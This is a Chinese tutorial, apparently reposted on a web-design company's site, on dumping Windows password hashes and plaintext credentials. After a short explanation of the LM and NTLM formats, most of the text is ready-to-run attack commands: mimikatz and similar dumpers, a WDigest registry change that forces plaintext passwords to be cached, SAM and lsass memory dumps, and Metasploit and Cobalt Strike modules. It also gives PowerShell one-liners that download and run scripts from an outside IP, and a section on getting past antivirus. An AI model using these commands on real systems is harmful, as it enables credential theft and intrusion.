今天就跟大家聊聊有關(guān)如何進(jìn)行windows hash的抓取，可能很多人都不太了解，為了讓大家更加了解，小編給大家總結(jié)了以下內(nèi)容，希望大家根據(jù)這篇文章可以有所收獲。

創(chuàng)新互聯(lián)專注于企業(yè)全網(wǎng)整合營銷推廣、網(wǎng)站重做改版、香格里拉網(wǎng)站定制設(shè)計(jì)、自適應(yīng)品牌網(wǎng)站建設(shè)、H5響應(yīng)式網(wǎng)站、成都商城網(wǎng)站開發(fā)、集團(tuán)公司官網(wǎng)建設(shè)、成都外貿(mào)網(wǎng)站建設(shè)公司、高端網(wǎng)站制作、響應(yīng)式網(wǎng)頁設(shè)計(jì)等建站業(yè)務(wù)，價(jià)格優(yōu)惠性價(jià)比高，為香格里拉等各大城市提供網(wǎng)站開發(fā)制作服務(wù)。

windows 密碼

windows hash由二部分組成，分別是LM HASH和NTLM HASH，這是對(duì)同一個(gè)密碼的兩種不同的加密方式。

組成為：username:RID:LM-HASH值:NTLM-HASH值

NTLM-Hash的生成方法為：

1.將明文口令轉(zhuǎn)換成十六進(jìn)制的格式

2.轉(zhuǎn)換成Unicode格式，即在每個(gè)字節(jié)之后添加0x00

3.對(duì)Unicode字符串作MD4加密，生成32位的十六進(jìn)制數(shù)字串

例如

賬戶密碼為cseroad@2008

十六進(jìn)制為 637365726f61644032303038

Unicode字符串為 63007300650072006f006100640040003200300030003800

NTLM-Hash為 82c58d8cec50de01fd109613369c158e

LM-Hash（LAN Manager Hash）是微軟的一種散列加密算法，本質(zhì)為DES加密，具體原理參考LM-Hash && NTLM-Hash

當(dāng)LM Hash是AAD3B435B51404EEAAD3B435B51404EE 這表示空密碼或者是未使用LM_HASH。

這里不做過多解釋，因?yàn)閺腤indows Server 2008版本開始，系統(tǒng)禁用了LM hash。

獲取hash的工具

原理：lsass.exe進(jìn)程用于實(shí)現(xiàn)windows安全策略（本地安全策略和登錄策略）?？梢允褂霉ぞ邔⑸⒘兄岛兔魑拿艽a從內(nèi)存的lsass.exe進(jìn)程或者SAM文件中導(dǎo)出。SAM文件保存在C:\Windows\System32\config目錄下，該文件被鎖定，不允許復(fù)制。

以下工具都以管理員身份運(yùn)行

QuarksPwDump工具

該工具支持Windows XP/2003/Vista/7/2008版本，且相當(dāng)穩(wěn)定。

可以抓取windows平臺(tái)下多種類型的用戶憑據(jù)，包括：本地帳戶、域帳戶、緩存的域帳戶。

下載地址：https://codeload.github.com/quarkslab/quarkspwdump/zip/master

完整源代碼可以從https://github.com/quarkslab/quarkspwdump獲取

Quarkspwdump.exe --dump-hash-local   導(dǎo)出用戶的NTLM Hash

LaZagne工具

LaZagne是一款用于檢索大量存儲(chǔ)在本地計(jì)算機(jī)密碼的開源應(yīng)用程序。

該工具不僅能抓取windows密碼，還可以抓取瀏覽器中的緩存的密碼、SVN密碼、wifi密碼、郵箱密碼等功能，適用于windows、Linux、MAC

下載地址 https://github.com/AlessandroZ/LaZagne

運(yùn)行命令

LaZagne.exe all

getpass.exe工具

該工具由閃電小子根據(jù)mimikatz編譯，可以直接獲取明文密碼。直接運(yùn)行g(shù)etpass.exe即可。

Pwdump7.exe工具

拷貝libeay32.dll和Pwdump7.exe在同一目錄下直接運(yùn)行Pwdump7.txt即可

wce工具

該工具分為32位、64位。它可以列舉登陸會(huì)話，并且可以添加、改變和刪除相關(guān)憑據(jù)。命令為

wce.exe -w  讀取系統(tǒng)明文密碼

wme.exe -l  獲取hash

powershell 腳本

Get-PassHashes.ps1腳本

cmd直接運(yùn)行命令

powershell IEX (New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/ps/Get-PassHashes.ps1');Get-PassHashes

Get-PassHashes.ps1 腳本

cmd直接運(yùn)行命令

powershell iex (New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/nishang/Gather/Get-PassHashes.ps1');Get-PassHashes

Invoke-Mimikatz.ps1 腳本

依然使用的mimikatz讀取密碼

powershell IEX (New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/ps/Invoke-Mimikatz.ps1'); Invoke-Mimikatz

Out-Minidump.ps1 腳本

獲取lsass.exe的dumps

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); "Get-Process lsass | Out-Minidump"

再用mimikatz從dumps中獲取明文。

mimikatz.exe "sekurlsa::minidump lsass_528.dmp" "sekurlsa::logonPasswords full" exit

mimikatz工具

可用來抓取hash以及明文。命令為

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" "exit"

當(dāng)系統(tǒng)為win10或2012R2以上時(shí)，默認(rèn)在內(nèi)存緩存中禁止保存明文密碼，此時(shí)可以通過修改注冊(cè)表的方式抓取明文，但需要用戶重新登錄后才能成功抓取。修改注冊(cè)表命令為：

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

重啟后可抓取hash

SAM表獲取hash

導(dǎo)出導(dǎo)出SAM和System文件

reg save HKLM\SYSTEM sys.hiv 
reg save HKLM\SAM sam.hiv

將注冊(cè)表的SAM、System文件導(dǎo)出到本地磁盤。使用mimikatz讀取SAM和System文件?？色@取NTLM Hash

mimikatz.exe "lsadump::sam /system:sys.hiv /sam:sam.hiv" exit

metaploit 框架

在得到session的基礎(chǔ)上，嘗試抓取hash值。metasploit支持多種hash獲取。

1.hashdump命令在system權(quán)限下，可抓取hash

2.windows/gather/smart_hashdump 腳本可以獲取域內(nèi)的用戶 hash

并將所有hash導(dǎo)出到/root/.msf4/loot/20200218155855_default_10.211.55.16_windows.hashes_396577.txt

3.load mimikatz 命令加載mimikatz

msv          獲取hash
kerberos     獲取明文
ssp          獲取明文信息
tspkg        嘗試檢索tspkg憑據(jù)
wdigest      嘗試檢索wdigest憑據(jù)
mimikatz_command -f samdump::hashes   獲取hash
mimikatz_command -f sekurlsa::searchPasswords   獲取明文密碼

cobalt strike框架

Dump Hashes   #獲取hash
Run Mimikatz  #運(yùn)行 Mimikatz

在beacon在執(zhí)行的命令對(duì)應(yīng)

hashdump        獲取hash值 
logonpasswords  相當(dāng)于mimikatz_command -f sekurlsa::searchPasswords

Empire框架

Empire也是內(nèi)置了mimikatz來讀取hash。

免殺

prodump.exe工具

該工具是微軟出品的工具，具有一定免殺效果。可以利用procdump把lsass進(jìn)程的內(nèi)存文件導(dǎo)出本地，再在本地利用mimikatz讀取密碼。

procdump.exe -accepteula -ma lsass.exe lsass.dmp  導(dǎo)出lsass.dmp

再使用mimikatz讀取密碼

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

需要注意的是從目標(biāo)機(jī)器導(dǎo)出的lsass.dmp需要在相同系統(tǒng)下運(yùn)行。

SqlDumper.exe工具

該工具也是微軟出品，也具備一定免殺能力。

SqlDumper.exe默認(rèn)存放在C:\Program Files\Microsoft SQL Server\number\Shared，number代表SQL Server的版本。如果目標(biāo)機(jī)器沒有安裝SQL Server，自己上傳SqlDumper.exe

tasklist /svc | findstr lsass.exe  查看lsass.exe 的ProcessID

Sqldumper.exe ProcessID 0 0x01100  導(dǎo)出dump文件

mimikatz加載dump文件

mimikatz.exe "sekurlsa::minidumpSQLDmpr0002.mdmp" "sekurlsa::logonPasswords full" exit

SharpDump工具

Out-Minidump.ps1 腳本C#版本編譯后的結(jié)果。

把lsass.exe進(jìn)程數(shù)據(jù)導(dǎo)出來dump的文件的后綴名為bin，拖到本地機(jī)器上后，先重命名為 zip，然后再解壓并使用本地的mimikatz進(jìn)行讀取。

mimikatz.exe "sekurlsa::minidump debug520" "sekurlsa::logonPasswords full" "exit"

看完上述內(nèi)容，你們對(duì)如何進(jìn)行windows hash的抓取有進(jìn)一步的了解嗎？如果還想了解更多知識(shí)或者相關(guān)內(nèi)容，請(qǐng)關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道，感謝大家的支持。

網(wǎng)站欄目：如何進(jìn)行windowshash的抓取
網(wǎng)站鏈接：http://jinyejixie.com/article2/gpepoc.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供小程序開發(fā)、靜態(tài)網(wǎng)站、網(wǎng)站營銷、企業(yè)建站、App開發(fā)、外貿(mào)建站

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請(qǐng)盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng)，如需處理請(qǐng)聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來源： 創(chuàng)新互聯(lián)